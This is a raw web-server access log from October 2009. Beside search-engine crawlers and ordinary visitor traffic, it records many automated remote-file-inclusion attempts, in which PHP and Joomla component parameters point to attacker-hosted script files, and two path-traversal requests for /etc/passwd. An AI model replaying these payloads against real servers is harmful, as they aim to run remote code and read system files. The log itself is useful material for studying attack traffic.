221.143.43.208 - - [28/Oct/2009:07:21:01 -0400] "GET /logs//galeria.php?start=0&kategoria=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
66.249.65.200 - - [28/Oct/2009:07:21:25 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0106C342883975002969048+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
93.93.131.94 - - [28/Oct/2009:07:21:30 -0400] "GET /logs/error_log.Q109072400//skin/zero_vote/login.php?dir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:07:21:30 -0400] "GET //skin/zero_vote/login.php?dir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 223 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:07:21:30 -0400] "GET /logs//skin/zero_vote/login.php?dir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:07:21:35 -0400] "GET /logs/access_log.Q109051500//skin/zero_vote/login.php?dir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:07:21:35 -0400] "GET /logs/error_log.Q109072400//skin/zero_vote/login.php?dir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:07:21:36 -0400] "GET //skin/zero_vote/login.php?dir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 223 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:07:21:36 -0400] "GET /logs//skin/zero_vote/login.php?dir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:07:21:40 -0400] "GET /logs/access_log.Q109051500//skin/zero_vote/login.php?dir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:07:22:05 -0400] "GET /logs/error_log.Q109072400//skin/zero_vote/login.php?dir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:07:22:06 -0400] "GET //skin/zero_vote/login.php?dir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 223 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:07:22:06 -0400] "GET /logs//skin/zero_vote/login.php?dir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:07:22:10 -0400] "GET /logs/access_log.Q109051500//skin/zero_vote/login.php?dir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
221.143.43.208 - - [28/Oct/2009:07:24:23 -0400] "GET /logs//galeria.php?start=0&kategoria=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
221.143.43.208 - - [28/Oct/2009:07:24:23 -0400] "GET //galeria.php?start=0&kategoria=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
221.143.43.208 - - [28/Oct/2009:07:24:23 -0400] "GET /logs/access_log.Q109051800%20%20//galeria.php?start=0&kategoria=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Oct/2009:07:24:33 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
221.143.43.208 - - [28/Oct/2009:07:24:36 -0400] "GET /logs/access_log.Q109071800%20%20//galeria.php?start=0&kategoria=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
82.193.15.3 - - [28/Oct/2009:07:24:58 -0400] "GET /logs/access_log.Q109070100%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
66.249.65.201 - - [28/Oct/2009:07:25:06 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L3174254E4F69E000590908V+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
221.143.43.208 - - [28/Oct/2009:07:25:33 -0400] "GET /logs/access_log.Q109051800%20%20//galeria.php?start=0&kategoria=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
221.143.43.208 - - [28/Oct/2009:07:25:47 -0400] "GET /logs/access_log.Q109051800%20%20//galeria.php?start=0&kategoria=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
221.143.43.208 - - [28/Oct/2009:07:25:58 -0400] "GET /logs/access_log.Q109071800%20%20//galeria.php?start=0&kategoria=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
221.143.43.208 - - [28/Oct/2009:07:26:07 -0400] "GET /logs/access_log.Q109071800%20%20//galeria.php?start=0&kategoria=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
123.125.66.130 - - [28/Oct/2009:07:26:23 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
217.199.218.29 - - [28/Oct/2009:07:26:33 -0400] "GET /logs/error_log.Q109072400//skin/zero_vote/login.php?dir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
217.199.218.29 - - [28/Oct/2009:07:26:33 -0400] "GET //skin/zero_vote/login.php?dir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 223 "-" "libwww-perl/5.805"
217.199.218.29 - - [28/Oct/2009:07:26:34 -0400] "GET /logs//skin/zero_vote/login.php?dir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
217.199.218.29 - - [28/Oct/2009:07:26:47 -0400] "GET /logs/access_log.Q109051500//skin/zero_vote/login.php?dir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
217.199.218.29 - - [28/Oct/2009:07:26:55 -0400] "GET /logs/error_log.Q109072400//skin/zero_vote/login.php?dir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
217.199.218.29 - - [28/Oct/2009:07:26:55 -0400] "GET //skin/zero_vote/login.php?dir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 223 "-" "libwww-perl/5.805"
217.199.218.29 - - [28/Oct/2009:07:26:55 -0400] "GET /logs//skin/zero_vote/login.php?dir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
217.199.218.29 - - [28/Oct/2009:07:27:14 -0400] "GET /logs/error_log.Q109072400//skin/zero_vote/login.php?dir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
217.199.218.29 - - [28/Oct/2009:07:27:14 -0400] "GET //skin/zero_vote/login.php?dir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 223 "-" "libwww-perl/5.805"
217.199.218.29 - - [28/Oct/2009:07:27:14 -0400] "GET /logs//skin/zero_vote/login.php?dir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
217.199.218.29 - - [28/Oct/2009:07:27:16 -0400] "GET /logs/access_log.Q109051500//skin/zero_vote/login.php?dir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
217.199.218.29 - - [28/Oct/2009:07:27:30 -0400] "GET /logs/access_log.Q109051500//skin/zero_vote/login.php?dir=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
82.193.15.3 - - [28/Oct/2009:07:28:14 -0400] "GET /logs/access_log.Q109091400%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
211.233.8.249 - - [28/Oct/2009:07:28:20 -0400] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs//skin/zero_vote/id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
211.233.8.249 - - [28/Oct/2009:07:28:20 -0400] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs//skin/zero_vote/id1.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
211.233.8.249 - - [28/Oct/2009:07:28:26 -0400] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs//skin/zero_vote/id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
211.233.8.249 - - [28/Oct/2009:07:28:26 -0400] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs//skin/zero_vote/id1.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
211.233.8.249 - - [28/Oct/2009:07:28:26 -0400] "GET /logs/access_log.Q109090600%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs//skin/zero_vote/id1.txt??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
211.233.8.249 - - [28/Oct/2009:07:28:29 -0400] "GET /logs/access_log.Q109090600%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs//skin/zero_vote/id1.txt??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
66.249.65.201 - - [28/Oct/2009:07:28:47 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L3174254E4F994000550908V+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
211.233.8.249 - - [28/Oct/2009:07:28:52 -0400] "GET /logs/access_log.Q109051300%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs//skin/zero_vote/id1.txt??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
211.233.8.249 - - [28/Oct/2009:07:28:55 -0400] "GET /logs/access_log.Q109051300%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs//skin/zero_vote/id1.txt??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
220.181.7.120 - - [28/Oct/2009:07:29:04 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
209.59.12.99 - - [28/Oct/2009:07:29:34 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.65.201 - - [28/Oct/2009:07:32:26 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0183B94E595924004B79051+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
222.236.47.182 - - [28/Oct/2009:07:33:53 -0400] "GET /logs/access_log.Q109072400%20%20//skin/zero_vote/login.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
222.236.47.182 - - [28/Oct/2009:07:34:16 -0400] "GET /logs/access_log.Q109060400%20%20//skin/zero_vote/login.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
82.193.15.3 - - [28/Oct/2009:07:34:24 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
82.193.15.3 - - [28/Oct/2009:07:34:24 -0400] "GET /logs/error_log.Q109082100//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Oct/2009:07:34:34 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.11.145.8 - - [28/Oct/2009:07:35:53 -0400] "GET /logs/access_log.Q109091100//board//include/write.php?dir=http://pushkinhouse.readershp.com/zeroboard/data/teature1/1194568816/id.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
72.11.145.8 - - [28/Oct/2009:07:35:53 -0400] "GET //board//include/write.php?dir=http://pushkinhouse.readershp.com/zeroboard/data/teature1/1194568816/id.txt??? HTTP/1.1" 404 223 "-" "libwww-perl/5.805"
72.11.145.8 - - [28/Oct/2009:07:35:55 -0400] "GET /logs/access_log.Q109100100//board//include/write.php?dir=http://pushkinhouse.readershp.com/zeroboard/data/teature1/1194568816/id.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
72.11.145.8 - - [28/Oct/2009:07:35:57 -0400] "GET /logs//board//include/write.php?dir=http://pushkinhouse.readershp.com/zeroboard/data/teature1/1194568816/id.txt??? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
66.249.65.201 - - [28/Oct/2009:07:35:58 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.201 - - [28/Oct/2009:07:35:58 -0400] "GET /logs/error_log.Q109101300 HTTP/1.1" 200 3555602 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.201 - - [28/Oct/2009:07:36:29 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0183B94E5939F4004479051+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
211.233.8.249 - - [28/Oct/2009:07:36:31 -0400] "GET /logs/access_log.Q109051300/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs//skin/zero_vote/id1.txt??? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
211.233.8.249 - - [28/Oct/2009:07:36:31 -0400] "GET /logs/access_log.Q109090600/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs//skin/zero_vote/id1.txt??? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
211.233.8.249 - - [28/Oct/2009:07:36:54 -0400] "GET /logs/access_log.Q109051300/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs//skin/zero_vote/id1.txt??? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
211.233.8.249 - - [28/Oct/2009:07:36:54 -0400] "GET /logs/access_log.Q109090600/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs//skin/zero_vote/id1.txt??? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
98.129.217.53 - - [28/Oct/2009:07:37:02 -0400] "GET /logs/access_log.Q109091400//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://mobilemagic.sanook.com/cache/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
98.129.217.53 - - [28/Oct/2009:07:37:02 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://mobilemagic.sanook.com/cache/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
98.129.217.53 - - [28/Oct/2009:07:37:02 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://mobilemagic.sanook.com/cache/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
98.129.217.53 - - [28/Oct/2009:07:37:02 -0400] "GET /logs/access_log.Q109080400//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://mobilemagic.sanook.com/cache/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
98.129.217.53 - - [28/Oct/2009:07:37:04 -0400] "GET /logs/access_log.Q109080400//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://mobilemagic.sanook.com/cache/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
98.129.217.53 - - [28/Oct/2009:07:37:04 -0400] "GET /logs/access_log.Q109091400//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://mobilemagic.sanook.com/cache/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
98.129.217.53 - - [28/Oct/2009:07:37:04 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://mobilemagic.sanook.com/cache/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
98.129.217.53 - - [28/Oct/2009:07:37:04 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://mobilemagic.sanook.com/cache/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
61.206.45.161 - - [28/Oct/2009:07:37:37 -0400] "GET /index.php?v=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 207 "-" "-"
61.206.45.161 - - [28/Oct/2009:07:37:37 -0400] "GET /index.php?v=./../../../../../../../../etc/passwd HTTP/1.1" 404 207 "-" "-"
174.143.3.188 - - [28/Oct/2009:07:38:09 -0400] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 250 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
174.143.3.188 - - [28/Oct/2009:07:38:09 -0400] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 245 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
174.143.3.188 - - [28/Oct/2009:07:38:09 -0400] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 250 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
174.143.3.188 - - [28/Oct/2009:07:38:09 -0400] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
67.214.161.230 - - [28/Oct/2009:07:38:56 -0400] "GET /logs/error_log.q109051700 HTTP/1.1" 200 2869991 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
209.59.12.99 - - [28/Oct/2009:07:39:34 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.195.110.164 - - [28/Oct/2009:07:39:46 -0400] "GET /logs/error_log.Q109100100 HTTP/1.0" 200 2897063 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
98.129.217.53 - - [28/Oct/2009:07:40:01 -0400] "GET /logs/access_log.Q109091400%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://mobilemagic.sanook.com/cache/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
98.129.217.53 - - [28/Oct/2009:07:40:01 -0400] "GET /logs/access_log.Q109080400%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://mobilemagic.sanook.com/cache/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
98.129.217.53 - - [28/Oct/2009:07:40:02 -0400] "GET /logs/access_log.Q109091400%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://mobilemagic.sanook.com/cache/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
98.129.217.53 - - [28/Oct/2009:07:40:06 -0400] "GET /logs/access_log.Q109080400%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://mobilemagic.sanook.com/cache/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
66.249.65.201 - - [28/Oct/2009:07:39:49 -0400] "GET /logs/access_log.Q109070400 HTTP/1.1" 200 1764892 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
67.195.110.164 - - [28/Oct/2009:07:39:47 -0400] "GET /logs/error_log.Q109100100 HTTP/1.0" 200 2897063 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
221.143.43.208 - - [28/Oct/2009:07:40:26 -0400] "GET /logs/access_log.Q109051800//galeria.php?start=0&kategoria=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
119.152.83.190 - - [28/Oct/2009:07:41:07 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
119.152.83.190 - - [28/Oct/2009:07:41:07 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
119.152.83.190 - - [28/Oct/2009:07:41:12 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
119.152.83.190 - - [28/Oct/2009:07:41:12 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
173.76.77.101 - - [28/Oct/2009:07:42:03 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/about.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)"
173.76.77.101 - - [28/Oct/2009:07:42:06 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/about.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)"
173.76.77.101 - - [28/Oct/2009:07:42:06 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/about.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)"
173.76.77.101 - - [28/Oct/2009:07:42:06 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/about.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)"
98.129.217.53 - - [28/Oct/2009:07:42:27 -0400] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://mobilemagic.sanook.com/cache/id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
98.129.217.53 - - [28/Oct/2009:07:42:27 -0400] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://mobilemagic.sanook.com/cache/id1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
98.129.217.53 - - [28/Oct/2009:07:42:27 -0400] "GET /logs/access_log.Q109063000%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://mobilemagic.sanook.com/cache/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
98.129.217.53 - - [28/Oct/2009:07:42:27 -0400] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://mobilemagic.sanook.com/cache/id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
98.129.217.53 - - [28/Oct/2009:07:42:27 -0400] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://mobilemagic.sanook.com/cache/id1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
98.129.217.53 - - [28/Oct/2009:07:42:28 -0400] "GET /logs/access_log.Q109063000%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://mobilemagic.sanook.com/cache/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
98.129.217.53 - - [28/Oct/2009:07:42:31 -0400] "GET /logs/access_log.Q109081500%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://mobilemagic.sanook.com/cache/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
98.129.217.53 - - [28/Oct/2009:07:42:32 -0400] "GET /logs/access_log.Q109081500%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://mobilemagic.sanook.com/cache/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
173.76.77.101 - - [28/Oct/2009:07:42:33 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76790 "http://www.acesurgical.com/about.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)"
64.55.93.46 - - [28/Oct/2009:07:42:21 -0400] "GET /logs/error_log.q109051000 HTTP/1.1" 200 4370886 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
66.249.65.201 - - [28/Oct/2009:07:43:30 -0400] "GET /logs/error_log.Q109062000 HTTP/1.1" 200 2513969 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
98.129.217.53 - - [28/Oct/2009:07:43:49 -0400] "GET /logs/access_log.Q109063000/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://mobilemagic.sanook.com/cache/id1.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
98.129.217.53 - - [28/Oct/2009:07:43:53 -0400] "GET /logs/access_log.Q109063000/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://mobilemagic.sanook.com/cache/id1.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
98.129.217.53 - - [28/Oct/2009:07:43:53 -0400] "GET /logs/access_log.Q109081500/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://mobilemagic.sanook.com/cache/id1.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
98.129.217.53 - - [28/Oct/2009:07:43:57 -0400] "GET /logs/access_log.Q109081500/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://mobilemagic.sanook.com/cache/id1.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Oct/2009:07:44:43 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
172.16.1.180 - - [28/Oct/2009:07:46:43 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [28/Oct/2009:07:46:43 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [28/Oct/2009:07:46:43 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
114.108.177.238 - - [28/Oct/2009:07:47:08 -0400] "GET //webcalendar//tools/send_reminders.php?noSet=0&includedir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
114.108.177.238 - - [28/Oct/2009:07:47:08 -0400] "GET /logs//webcalendar//tools/send_reminders.php?noSet=0&includedir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
